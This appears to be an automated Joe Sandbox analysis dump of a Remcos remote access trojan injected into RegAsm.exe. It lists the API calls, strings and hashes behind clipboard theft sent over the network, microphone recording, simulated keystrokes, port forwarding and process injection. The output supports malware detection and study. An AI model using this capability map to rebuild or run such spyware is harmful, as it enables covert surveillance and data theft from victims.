                                  • String ID: 0VG$0VG$<$@$Temp
                                  • API String ID: 1704390241-2575729100
                                  • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                  • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                  • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                  • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                  APIs
                                  • OpenClipboard.USER32 ref: 00416941
                                  • EmptyClipboard.USER32 ref: 0041694F
                                  • CloseClipboard.USER32 ref: 00416955
                                  • OpenClipboard.USER32 ref: 0041695C
                                  • GetClipboardData.USER32(0000000D), ref: 0041696C
                                  • GlobalLock.KERNEL32(00000000), ref: 00416975
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                  • CloseClipboard.USER32 ref: 00416984
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                  • String ID: !D@
                                  • API String ID: 2172192267-604454484
                                  • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                  • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                  • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                  • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                  APIs
                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                  • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                  • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                  • CloseHandle.KERNEL32(?), ref: 00413465
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                  • String ID:
                                  • API String ID: 297527592-0
                                  • Opcode ID: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                  • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                  • Opcode Fuzzy Hash: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                  • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                  • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                  • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                  • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                  APIs
                                  • _free.LIBCMT ref: 00448135
                                    • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                  • _free.LIBCMT ref: 00448141
                                  • _free.LIBCMT ref: 0044814C
                                  • _free.LIBCMT ref: 00448157
                                  • _free.LIBCMT ref: 00448162
                                  • _free.LIBCMT ref: 0044816D
                                  • _free.LIBCMT ref: 00448178
                                  • _free.LIBCMT ref: 00448183
                                  • _free.LIBCMT ref: 0044818E
                                  • _free.LIBCMT ref: 0044819C
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                  • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                  • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                  • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Eventinet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                  • API String ID: 3578746661-3604713145
                                  • Opcode ID: 1770ec6c0f5e3b286ceab69ad4fea226e85cf303756d03bb6ed0006363607c11
                                  • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                  • Opcode Fuzzy Hash: 1770ec6c0f5e3b286ceab69ad4fea226e85cf303756d03bb6ed0006363607c11
                                  • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                  APIs
                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DecodePointer
                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                  • API String ID: 3527080286-3064271455
                                  • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                  • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                  • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                  • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                  • Sleep.KERNEL32(00000064), ref: 00417521
                                  • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteShellSleep
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1462127192-2001430897
                                  • Opcode ID: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                                  • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                  • Opcode Fuzzy Hash: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                                  • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess
                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                  • API String ID: 2050909247-4242073005
                                  • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                  • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                  • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                  • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                  APIs
                                  • _strftime.LIBCMT ref: 00401D50
                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                  • API String ID: 3809562944-243156785
                                  • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                  • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                  • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                  • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                  • int.LIBCPMT ref: 00410E81
                                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                  • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                  • __Init_thread_footer.LIBCMT ref: 00410F29
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                  • String ID: ,kG$0kG
                                  • API String ID: 3815856325-2015055088
                                  • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                  • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                  • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                  • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                  APIs
                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                  • waveInStart.WINMM ref: 00401CFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                  • String ID: dMG$|MG$PG
                                  • API String ID: 1356121797-532278878
                                  • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                  • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                  • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                  • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                    • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                  • TranslateMessage.USER32(?), ref: 0041D4E9
                                  • DispatchMessageA.USER32(?), ref: 0041D4F3
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID: Remcos
                                  • API String ID: 1970332568-165870891
                                  • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                  • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                  • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                  • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                  • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                  • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                  • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • _memcmp.LIBVCRUNTIME ref: 00445423
                                  • _free.LIBCMT ref: 00445494
                                  • _free.LIBCMT ref: 004454AD
                                  • _free.LIBCMT ref: 004454DF
                                  • _free.LIBCMT ref: 004454E8
                                  • _free.LIBCMT ref: 004454F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast$_abort_memcmp
                                  • String ID: C
                                  • API String ID: 1679612858-1037565863
                                  • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                  • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                  • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                  • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: tcp$udp
                                  • API String ID: 0-3725065008
                                  • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                  • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                  • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                  • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                  • ExitThread.KERNEL32 ref: 004018F6
                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                  • String ID: PkG$XMG$NG$NG
                                  • API String ID: 1649129571-3151166067
                                  • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                  • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                  • Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                  • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                  • String ID: .part
                                  • API String ID: 1303771098-3499674018
                                  • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                  • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                  • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                  • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                  • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                  • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                  • __freea.LIBCMT ref: 0044AE30
                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  • __freea.LIBCMT ref: 0044AE39
                                  • __freea.LIBCMT ref: 0044AE5E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 3864826663-0
                                  • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                  • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                  • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                  • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                  APIs
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                  • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                  • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                  • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                  • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16_free
                                  • String ID: a/p$am/pm$zD
                                  • API String ID: 2936374016-2723203690
                                  • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                  • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                  • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                  • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Enum$InfoQueryValue
                                  • String ID: [regsplt]$xUG$TG
                                  • API String ID: 3554306468-1165877943
                                  • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                  • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                  • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                  • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                  APIs
